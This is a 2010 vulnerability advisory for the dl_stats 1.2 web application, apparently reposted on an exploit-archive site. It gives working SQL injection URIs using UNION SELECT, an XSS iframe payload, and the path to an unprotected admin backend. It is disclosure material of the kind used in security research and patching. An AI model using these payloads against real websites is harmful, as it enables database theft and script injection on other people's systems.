dl_stats 1.2 Multiple Vulnerabilities

2010-04-27 / 2010-04-28
Credit: Valentin
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-1497 | CVE-2010-1498
CWE: CWE-79
CWE-89

# Exploit Title: dl_stats Multiple Vulnerabilities # Date: 18.04.2010 # Author: Valentin # Category: webapps/0day # Version: # Tested on: # CVE : # Code : [:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::] |:: >> General Information |:: Advisory/Exploit Title = dl_stats Multiple Vulnerabilities |:: Author = Valentin Hoebel |:: Contact = valentin@xenuser.org |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::] |:: >> Product information |:: Name = dl_stats |:: Vendor = Claus van Beek |:: Vendor Website = http://clausvb.de/ |:: Affected Version(s) = please view vulnerability details |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::] |:: >> #1 Vulnerability |:: Type = SQL Injection |:: Affected Versions = < 2.0 |:: Vulnerable File(s) = multiple files |:: Vulnerable Parameter(s) = multiple parameters |:: #1 Example URI = view_file.php?id=6+AND+1=2+UNION+SELECT+1,concat(user()),concat(user()),concat(user()),concat(user()),6,7,concat(user())-- |:: #2 Example URI = download.php?id=2+AND+1=2+UNION+SELECT+1,concat(user()),3,concat(user()),concat(user())-- |:: |:: >> #2 "Vulnerability" |:: Type = Unprotected Admin Backend |:: Affected Versions = all |:: URI = admin/index.htm |:: This is not a real vulnerability. The admin backend simply isn't protected |:: by any login, the installation manual recommends to protect it with a |:: .htaccess file. Many webmasters just forget to do so. |:: |:: >> #3 Vulnerability |:: Type = XSS |:: Affected Versions = < 2.0 |:: Vulnerable File(s) = multiple files |:: Vulnerable Parameter(s) = multiple parameters |:: Example URI = download_proc.php?id=<iframe src=http://www.google.de> |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::] |:: >> Additional Information |:: Advisory/Exploit Published = 18.04.2010 |:: The vendor seems to have rewritten the dl_stats software. Since version 2.0 |:: it validates the user input. The vendor only offers the latest version for download. |:: If you want to test around a little bit you maybe are lucky and find an old |:: version to download somewhere. |:: Although version 2.0 was released a long time ago, many websites still use the |:: old versions for their websites. |:: |:: [:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::] |:: >> Misc |:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase! |:: |:: [:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]

References:

http://xforce.iss.net/xforce/xfdb/57917
http://www.xenuser.org/documents/security/dl_stats_multiple_vulnerabilities.txt
http://www.xenuser.org/2010/04/18/dl_stats-multiple-vulnerabilities-sqli-xss-unprotected-admin-panel/
http://www.vupen.com/english/advisories/2010/0939
http://www.securityfocus.com/bid/39592
http://www.osvdb.org/63908
http://www.osvdb.org/63907
http://www.exploit-db.com/exploits/12280
http://secunia.com/advisories/39496
http://packetstormsecurity.org/1004-exploits/dlstats-sqlxssadmin.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top